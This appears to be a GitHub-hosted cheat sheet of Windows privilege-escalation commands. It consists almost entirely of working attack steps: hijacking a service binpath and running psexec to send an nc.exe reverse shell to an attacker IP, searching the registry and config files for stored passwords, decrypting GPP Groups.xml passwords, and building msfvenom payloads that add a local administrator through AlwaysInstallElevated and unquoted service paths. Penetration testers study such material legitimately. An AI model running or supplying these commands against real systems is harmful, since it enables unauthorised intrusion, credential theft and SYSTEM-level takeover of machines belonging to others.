-
Notifications
You must be signed in to change notification settings - Fork 179
/
Priv Esc - Windows
149 lines (116 loc) · 4.29 KB
/
Priv Esc - Windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
Windows
Enumeration
# basics
systeminfo
hostname
echo %username%
# users
net users
net user <username>
# network
ipconfig /all
route print
arp -A
netstat -ano # active network connections
# firewall status
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
# systeminfo output save in a file, check for vulnerabilities
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
# Search patches for given patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
--------------------------------------
Kernel
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# check for possible exploits, find a place to upload (eg: C:\Inetpub or C:\temp) it, run exe
--------------------------------------
Weak permissions
# this example is for XP SP0
# upload accesschk.exe to a writable directory first
# for XP version 5.2 of accesschk.exe is needed
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
# check for serices with weak permissions
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# check for the found services above
accesschk.exe -ucqv upnphost
# upload nc.exe to writable directory
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv <attackerip> 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
# check the status now
sc qc upnphost
# change start option as AUTO-START
sc config SSDPSRV start= auto
#start the services
net start SSDPSRV
net stop upnphost
net start upnphost
# listen on port 9988 and you'll get a shell with NT AUTHORITY\SYSTEM privileges
--------------------------------------
Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
--------------------------------------
Places to Check for Credentials
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
----------------------------
Groups.xml
# Look up ip-addres of DC
nslookup nameofserver.whatever.local
# It will output something like this
Address: 192.168.1.101
# Now we mount it
net use z: \\192.168.1.101\SYSVOL
# And enter it
z:
# Now we search for the groups.xml file
dir Groups.xml /s
# decrypt the password in it
gpp-decrypt <pass>
-----------------------------
AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# From the output, notice that “AlwaysInstallElevated” value is 1.
# Exploitation:
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
Place 'setup.msi' in 'C:\Temp'
msiexec /quiet /qn /i C:\Temp\setup.msi
net localgroup Administrators
---------------------------------
Find writable files
dir /a-r-d /s /b
/a is to search for attributes. In this case r is read only and d is directory. (look for writable files only)
/s means recurse subdirectories
/b means bare format. Path and filename only.
-----------------------------------
Unquoted Path
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
# check for permissions of folder path
icacls "C:\Program Files (x86)\Program Folder"
# exploit
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
#Open command prompt and type:
sc start unquotedsrvc
net localgroup Administrators
-----------------------------------
# psexec using found credentials
# first upload nc.exe to a writable directory
psexec.exe -u <username> -p <password> \\MACHINENAME C:\Inetpub\nc.exe <attackerip> <attackerport> -e C:\windows\system32\cmd.exe